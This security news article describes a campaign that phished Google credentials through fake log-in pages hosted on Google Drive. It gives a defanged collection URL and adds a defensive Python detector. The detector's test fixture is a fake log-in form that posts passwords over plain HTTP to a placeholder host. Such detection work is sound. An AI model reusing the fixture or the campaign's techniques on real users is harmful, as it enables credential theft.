New Phishing Campaign Targets Google Credentials

Researchers have found a new phishing campaign leveraging Google Drive in order to steal credentials.

Phishers have again leveraged users’ trust in Google with a newly discovered campaign designed to steal credentials that grant access to the multitude of Google’s online services.

New phishing pages hosted on Google Drive were discovered by researcher Aditya K. Sood of Elastica Cloud Threat Labs. This campaign has the earmarks of a similar one uncovered in March 2014, which, like this one, presents the victim with a phony Google log-in page hosted on the Google platform and served over HTTPS. The phishing email subject lines are the same, “Document,” and the stolen credentials are hosted on a third-party server.

The campaign discovered by Elastica, however, adds a touch of additional code obfuscation to hide the phishing pages, indicating that if this is the same group behind both campaigns, their work is evolving and taking additional steps to elude detection.

“Using Google Drive for hosting phishing web pages provides an attacker with the ability to exploit the established trust users have with Google,” Sood said, adding that Google has removed the phishing pages.

Sood points out that the attackers are simply taking advantage of how Google Drive stores and presents content, saving themselves the time and effort it takes to properly craft an email-based phishing campaign. He also notes that because the pages are served over HTTPS, they look less suspicious to employees who have been trained to check for the padlock.

Access to Google credentials, in this case, is a big win for the attackers.

“In an effort to maximize benefits, attackers targeted Google users specifically so as to gain access to the multitude of services associated with those accounts, since Google uses Single Sign On (SSO) procedures,” Sood said.

Once the user receives the phishing email, which is sent from a Gmail address that has likely been compromised, they are asked to follow a Google Drive link. A phishing page that looks like a Google log-in page is served; if the user enters their credentials, those credentials are sent in plaintext to a compromised web server. The victim’s browser is then redirected to a PDF document hosted elsewhere, lending further credibility to the scam.

Sood says the emails are avoiding Google’s built-in detection capabilities, likely because they’re coming from a Gmail account and the link points to a legitimate googledrive.com domain.

Some elements on the phishing page, however, should rouse suspicion, Sood said.

“When you open ‘drive.google.com,’ Google redirects the browser to ‘accounts.google.com’ which carries the message, ‘One Account. All of Google,’ whereas this web page highlights the message ‘Google Drive. One Storage,’ which is not legitimate,” Sood said. “However, users targeted in this campaign might not notice this.”

The attackers also added a number of layers of obfuscated JavaScript to the phishing page, hiding among other things, the destination URL where the victim’s credentials are sent: hxxp://alarabia[.]my/images/Fresh/performact[.]php.
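The two indicators Sood describes, a log-in form that submits the password to a host outside Google and page branding that does not match the real accounts.google.com sign-in page, can be checked mechanically once the page's HTML has been retrieved. The script below is an added illustration written for this article; it is not Elastica's tooling or anything Google publishes. It uses only the Python standard library, assumes a small allow-list of Google domains (an assumption, not a complete list), and runs over two constructed HTML samples: the collector host `collector.example` is a placeholder, not the campaign's real server.

```python
"""Flag credential-harvesting indicators in a fetched HTML log-in page.

Added illustration for the campaign described above; not Elastica's code.
It checks the indicators the article names: a password form submitting
off-domain or over plaintext HTTP, and branding that does not match the
genuine Google sign-in page. The sample pages below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: a short allow-list of hosts to which a genuine Google
# sign-in form may submit. Real deployments would maintain a fuller list.
TRUSTED_SUFFIXES = ("google.com", "googleapis.com", "googleusercontent.com")

# Banner text quoted in the article for the real and the phony page.
EXPECTED_BANNER = "One Account. All of Google"
FAKE_BANNER = "Google Drive. One Storage"


class LoginFormParser(HTMLParser):
    """Collect each form's action URL, whether it has a password field, and visible text."""

    def __init__(self):
        super().__init__()
        self.forms = []        # dicts: {"action": str, "has_password": bool}
        self.text = []         # visible text fragments, for the branding check
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and a.get("type", "").lower() == "password":
            if self._current is not None:
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

    def handle_data(self, data):
        self.text.append(data)


def _is_trusted_host(action_url, page_url):
    """Resolve a relative action against the page URL, then check the allow-list."""
    host = (urlparse(action_url).hostname or urlparse(page_url).hostname or "").lower()
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def analyse_login_page(html, page_url):
    """Return a list of indicator strings; an empty list means nothing suspicious."""
    parser = LoginFormParser()
    parser.feed(html)
    parser.close()
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        if urlparse(form["action"]).scheme == "http":
            findings.append("password form submits over plaintext HTTP: " + form["action"])
        if not _is_trusted_host(form["action"], page_url):
            findings.append("password form submits off-domain: " + form["action"])
    visible = " ".join(parser.text)
    if EXPECTED_BANNER not in visible:
        findings.append("expected Google sign-in banner is missing")
    if FAKE_BANNER in visible:
        findings.append("page shows the non-Google banner seen in this campaign")
    return findings


# Constructed sample resembling the described phishing page (placeholder host).
SAMPLE_PHISH = """
<html><body>
<h1>Google Drive. One Storage</h1>
<form method="post" action="http://collector.example/collect.php">
  <input type="email" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form></body></html>
"""

# Constructed sample resembling a genuine sign-in page.
SAMPLE_LEGIT = """
<html><body><h1>One Account. All of Google</h1>
<form method="post" action="https://accounts.google.com/signin/challenge">
  <input type="email" name="Email"><input type="password" name="Passwd">
</form></body></html>
"""

if __name__ == "__main__":
    for name, page in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, analyse_login_page(page, "https://googledrive.com/host/example") or ["clean"])
```

The check runs on the rendered HTML, so the obfuscated JavaScript the campaign uses to hide the destination URL is only seen after a browser or sandbox has executed it; feeding the post-execution DOM rather than the raw source is what makes the off-domain action visible.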

Sood said that Elastica has reported details of this campaign to Google.
